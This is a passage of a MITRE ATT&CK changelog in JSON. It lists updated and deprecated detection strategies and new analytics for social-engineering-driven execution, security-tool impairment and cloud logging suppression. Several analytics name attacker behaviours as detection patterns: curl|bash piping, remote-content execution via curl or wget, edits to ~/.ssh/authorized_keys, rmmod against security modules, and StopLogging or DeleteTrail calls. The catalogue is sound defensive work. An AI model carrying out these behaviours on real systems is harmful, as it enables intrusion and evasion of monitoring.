                    "id": "x-mitre-detection-strategy--da1e3af8-d79b-44ff-a907-ae107c110671",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0595",
                            "external_id": "DET0595"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:26:05.352Z",
                    "name": "Detection Strategy for Exploitation for Stealth",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--e5b0fcab-05e5-4687-a1a9-dd382a19980b",
                        "x-mitre-analytic--ecf26d05-48ef-43b2-bfc3-4ea331be735b",
                        "x-mitre-analytic--88d9dbea-cc85-4c94-a368-e5c1a603854b",
                        "x-mitre-analytic--458038e6-60a2-47d2-bd55-675e77f0e279",
                        "x-mitre-analytic--77c3b78a-fb34-4040-9dda-057e8eca3362"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:26:05.352Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection Strategy for Exploitation for Stealth\", \"old_value\": \"Detection Strategy for Exploitation for Defense Evasion\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--fecfb9f9-645e-4e09-ba21-05bc60722688",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0311",
                            "external_id": "DET0311"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:26:14.331Z",
                    "name": "Detection for Spoofing Tool UI across OS Platforms",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--0f4ec296-008e-42aa-95b2-6e4e351d730c",
                        "x-mitre-analytic--d1feb97f-3683-49f5-b5a8-b54d58de3444",
                        "x-mitre-analytic--d9eb3056-115b-496a-89f7-be38470ff022"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:26:14.331Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection for Spoofing Tool UI across OS Platforms\", \"old_value\": \"Detection for Spoofing Security Alerting across OS Platforms\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--2729a43c-3f8d-4fee-b2bd-f773436d051b",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0588",
                            "external_id": "DET0588"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:26:25.154Z",
                    "name": "Detection of Remote Service Session Hijacking for RDP.",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--be773ad4-9e5f-4063-910a-99a3cab90582"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:26:25.154Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection of Remote Service Session Hijacking for RDP.\", \"old_value\": \"Detection fo Remote Service Session Hijacking for RDP.\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--3a114d11-0850-4c33-b828-359e59b15250",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0306",
                            "external_id": "DET0306"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:26:54.885Z",
                    "name": "Detection of Unauthorized Network Firewall Rule Modification",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--17ce541a-23fa-4b33-affc-c6ba906e9956"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:26:54.885Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection of Unauthorized Network Firewall Rule Modification\", \"old_value\": \"Unauthorized Network Firewall Rule Modification (T1562.013)\"}}}",
                    "previous_version": "1.0"
                }
            ],
            "revocations": [],
            "deprecations": [
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--e8e88bcd-0294-48d2-bd3c-0408814f4a69",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0317",
                            "external_id": "DET0317"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:27:16.119Z",
                    "name": "Detection Strategy for Impair Defenses Across Platforms",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": true,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--febc685b-997f-4095-b60b-5dfeefe01ae3",
                        "x-mitre-analytic--003dd2ae-b156-4ebd-8a59-76f993056552",
                        "x-mitre-analytic--fb51dd4c-b751-4282-a447-d9f5f257b435",
                        "x-mitre-analytic--2a4f23d7-3f80-45b7-90ec-b13fdd7f8d70",
                        "x-mitre-analytic--d2762796-1dea-448a-970a-7aeb176aa668",
                        "x-mitre-analytic--ac692681-2851-41b4-aff9-4b5efc4c40c8",
                        "x-mitre-analytic--0ba25127-85e4-46ef-8173-96aa9df90c22",
                        "x-mitre-analytic--dc5bfda5-057d-4bec-b3e6-a6b2117a4134",
                        "x-mitre-analytic--a807fb55-1c4f-4353-90d6-1a05aa05f2c9"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:27:16.119Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['x_mitre_deprecated']\": {\"new_value\": true, \"old_value\": false}}}"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--0596d971-9552-4cd0-a5aa-4385cf707371",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0239",
                            "external_id": "DET0239"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:27:28.990Z",
                    "name": "Detection Strategy for Impair Defenses Indicator Blocking",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": true,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--945f8192-6f4f-4183-b457-40b5c6d9b4ca",
                        "x-mitre-analytic--63e17792-17f5-48ae-8002-da6b62b4bcaa",
                        "x-mitre-analytic--9274294a-dfc3-4084-b228-dfb36448f077",
                        "x-mitre-analytic--b3828af6-912b-493b-b621-3448a8f07972"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:27:28.990Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['x_mitre_deprecated']\": {\"new_value\": true, \"old_value\": false}}}"
                }
            ],
            "deletions": []
        },
        "analytics": {
            "additions": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f238e0f3-7354-4304-9101-69cefd8446fc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 16:23:55.764000+00:00",
                    "modified": "2026-04-24 20:33:42.205000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2033",
                            "external_id": "AN2033"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2033",
                    "description": "Detects suspicious inbound communications or collaboration requests followed by rapid sensitive user actions such as file sharing changes, macro enablement, OAuth consent, credential submission, or financial workflow approvals that deviate from historical relationships or normal approval patterns.\n      ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "m365:unified",
                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "m365:exchange",
                            "channel": "External sender message followed by user action involving links or attachments"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "m365:teams",
                            "channel": "External chat request or new tenant communication preceding approval activity"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ActionAfterMessageWindow",
                            "description": "Time window between inbound communication and sensitive action"
                        },
                        {
                            "field": "TrustedDomainAllowlist",
                            "description": "Known legitimate vendors or partner domains"
                        },
                        {
                            "field": "ApprovalAmountThreshold",
                            "description": "Monetary threshold for finance workflows"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Office Suite"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e817eb45-0830-476d-9fd7-8e8acb14af8a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 16:27:31.873000+00:00",
                    "modified": "2026-04-24 20:33:35.460000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2034",
                            "external_id": "AN2034"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2034",
                    "description": "Detects consent grants, password resets, role changes, external sharing, or token creation shortly after user interaction with messages, invites, or help desk workflows. Emphasis is placed on unusual requester relationships, new device context, or off-hours approvals.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
                            "name": "saas:okta",
                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "saas:slack",
                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "saas:zoom",
                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "RequesterNoveltyDays",
                            "description": "How long since requestor last interacted with user"
                        },
                        {
                            "field": "GeoVelocityThreshold",
                            "description": "Distance/time anomaly for follow-on login"
                        },
                        {
                            "field": "AfterHoursDefinition",
                            "description": "Organization-specific off-hours period"
                        }
                    ],
                    "x_mitre_platforms": [
                        "SaaS"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--983e1849-6af7-491e-9605-46b9bf54bbd1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 16:31:03.795000+00:00",
                    "modified": "2026-04-24 20:32:37.936000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2035",
                            "external_id": "AN2035"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2035",
                    "description": "Detects user execution of newly received content or instructions shortly after external communication, including script launches, Office child process spawning, browser-to-script execution chains, or credential prompts followed by new logon sessions.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4624, 4648"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=11"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "EmailToExecutionWindow",
                            "description": "Time between message delivery and process launch"
                        },
                        {
                            "field": "OfficeChildProcessAllowlist",
                            "description": "Approved Office child process patterns"
                        },
                        {
                            "field": "NewLogonWindow",
                            "description": "Time after credential prompt to monitor new sessions"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--fc19b602-2811-418f-aa98-1b49f1355743",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 16:38:58.641000+00:00",
                    "modified": "2026-04-24 20:33:48.643000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2036",
                            "external_id": "AN2036"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2036",
                    "description": "Detects user-authorized execution of downloaded content or scripts after communication prompts, including browser downloads followed by osascript, shell, or installer execution and subsequent network activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "NSM:Connections",
                            "channel": "Outbound connection after script or installer launch"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "macos:unifiedlog",
                            "channel": "Recent download opened or executed"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "DownloadToExecutionWindow",
                            "description": "Time between download and launch"
                        },
                        {
                            "field": "InstallerParentAllowlist",
                            "description": "Legitimate software deployment parents"
                        }
                    ],
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--54bb8256-cbe8-4088-9cff-b03711bd7841",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 16:43:32.659000+00:00",
                    "modified": "2026-04-24 20:31:48.301000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2037",
                            "external_id": "AN2037"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2037",
                    "description": "Detects users executing commands copied from chats, tickets, or emails, including curl|bash patterns, shell script launches from temp directories, credential changes, or SSH key additions shortly after communication events.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "NSM:Connections",
                            "channel": "Outbound connection after script or installer launch"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "auditd:EXECVE",
                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                            "name": "auditd:PATH",
                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "RemoteScriptExecutionPatterns",
                            "description": "Organization-specific admin automation patterns to exclude"
                        },
                        {
                            "field": "TicketToExecutionWindow",
                            "description": "Time from help desk/chat event to command execution"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7ec436a3-dd31-4d23-a51b-0e03d3c474bd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 16:54:55.315000+00:00",
                    "modified": "2026-04-24 20:32:20.041000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2038",
                            "external_id": "AN2038"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2038",
                    "description": "Detects suspicious interactions with security products followed by service crashes, unexpected restarts, driver unloads, telemetry gaps, or tamper-state changes. Correlates exploit precursor behavior with immediate degradation of defensive services and follow-on process execution.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                            "name": "WinEventLog:System",
                            "channel": "EventCode=7035"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=6"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "CrashCorrelationWindow",
                            "description": "Time between suspicious interaction and security service failure"
                        },
                        {
                            "field": "ProtectedServiceList",
                            "description": "Security agents/services expected to remain stable"
                        },
                        {
                            "field": "TelemetryGapThreshold",
                            "description": "Acceptable heartbeat silence duration"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--c6fb992c-387e-49ee-beaf-a1351aded262",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 17:00:04.135000+00:00",
                    "modified": "2026-04-24 20:33:08.936000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2039",
                            "external_id": "AN2039"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2039",
                    "description": "Detects exploitation attempts against security daemons or kernel security modules followed by daemon termination, disabled logging, module unload, audit stoppage, or reduced endpoint telemetry. Correlates local execution or network input with control degradation.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "auditd:EXECVE",
                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                            "name": "auditd:DAEMON",
                            "channel": "auditd stopped, config changed, logging suspended"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ProtectedProcessNames",
                            "description": "Names of EDR, audit, AV, firewall daemons"
                        },
                        {
                            "field": "ModuleUnloadAllowlist",
                            "description": "Approved maintenance unload operations"
                        },
                        {
                            "field": "HealthGapThreshold",
                            "description": "Expected telemetry heartbeat tolerance"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9df50fd3-bbad-43ce-b511-1bf995f1b583",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 17:03:37.991000+00:00",
                    "modified": "2026-04-24 20:32:41.903000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2040",
                            "external_id": "AN2040"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2040",
                    "description": "Detects crafted activity resulting in crashes or impairment of endpoint security extensions, network filters, launch daemons, or telemetry agents. Correlates process activity, system extension state changes, and telemetry interruption.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
                            "name": "macos:unifiedlog",
                            "channel": "Crash or abnormal termination of security agent or system extension host"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79",
                            "name": "macos:unifiedlog",
                            "channel": "Extension disabled, unloaded, failed to start"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Traffic spike preceding control crash"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ExtensionList",
                            "description": "Protected security system extensions"
                        },
                        {
                            "field": "CrashBurstThreshold",
                            "description": "Multiple failures in short interval"
                        }
                    ],
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--47df93f9-b33f-4333-95b6-b3cca9418a4d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 17:08:44.505000+00:00",
                    "modified": "2026-04-24 20:31:38.954000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2041",
                            "external_id": "AN2041"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2041",
                    "description": "Detects exploitation of cloud-native security boundaries or management components followed by disabled logging, detached agents, changed security groups, policy bypass, or telemetry suppression. Correlates suspicious API activity with reduced control coverage.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--ec0612c5-2644-4c50-bcac-82586974fedd",
                            "name": "AWS:CloudTrail",
                            "channel": "StopLogging, DeleteTrail, or DisableSecurityService"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75",
